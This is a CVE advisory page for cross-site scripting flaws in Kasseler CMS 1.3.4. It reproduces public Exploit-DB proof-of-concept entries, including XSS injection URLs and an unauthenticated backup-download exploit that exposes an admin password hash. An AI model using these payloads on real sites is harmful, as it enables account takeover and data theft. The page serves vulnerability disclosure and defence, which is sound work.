CVE-2009-4822
Description
Multiple cross-site scripting (XSS) vulnerabilities in index.php in Kasseler CMS 1.3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) do, (2) id, and (3) uname parameters.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/37435/info
Kasseler CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
Kasseler CMS 1.3.4 Lite is vulnerable; other versions may also be affected.
http://www.example.com/index.php?module=[target]&do=View&id="><script>alert();</script>
http://www.example.com/index.php?module=[target]&do="><script>alert();</script>
http://www.example.com/index.php?module=Account&do=UserInfo&uname="><script>alert();</script>Kasseler CMS 2.0.5 - Bypass / Download Backup
========================================================================================
| # Title : kasseler cms 2.0.5 => by Pass / Download Backup Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Dork : Copyright ©2007-2009 by Kasseler CMS. All rights reserved.
| # Tested on: windows SP2 Français V.(Pnx2 2.0)
| # Bug : Backup
====================== Exploit By indoushka =================================
# Exploit :
1 - http://127.0.0.1/kasseler/backup.php
File size: 37.38 KB
Tables processed: 39
Rows processed: 37
2 - http://127.0.0.1/uploads/backup/auto_2010-04-27_14-29.sql
in lig 645:668 col 1 you found the login information
INSERT INTO `kasseler_users` VALUES
(-1, 'guest', 'Guest', '', '', 'default.png', '0000-00-00 00:00:00', 'default', 0, '', '', '', '', '', 5, '', '0', '', '0000-00-00 00:00:00', '', '', '0000-00-00', 0, '', '', '', '', '', '', 0, -1, 0, 0, 0, 0, 0, 0, '', 0, 'MBzx97cQMjKQ47tJgil9PBQDr', 1, 0, 0, '0.00', 0, 1, NULL),
(1, 'admin', 'admin', 'admin@127.0.0.1', 'http://127.0.0.1/', 'admin.png', '2010-04-27 11:25:22', 'default', 2, NULL, NULL, NULL, NULL, 'd0970714757783e6cf17b26fb8e2298f', 1, NULL, '0.0.0.0', 'N/A', '0000-00-00 00:00:00', 'N/A', 'N/A', '0000-00-00', 0, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, NULL, 1, 0, 0, '0.00', 0, 1, NULL);
3 - XSS :
http://127.0.0.1/index.php?online/<script>alert(213771818860)</script>
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : Exploit-db Team
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.sa-hacker.com * www.alkrsan.net * www.mormoroth.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| kasseler-cms | kasseler_cms | 1.3.4 | |
References
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.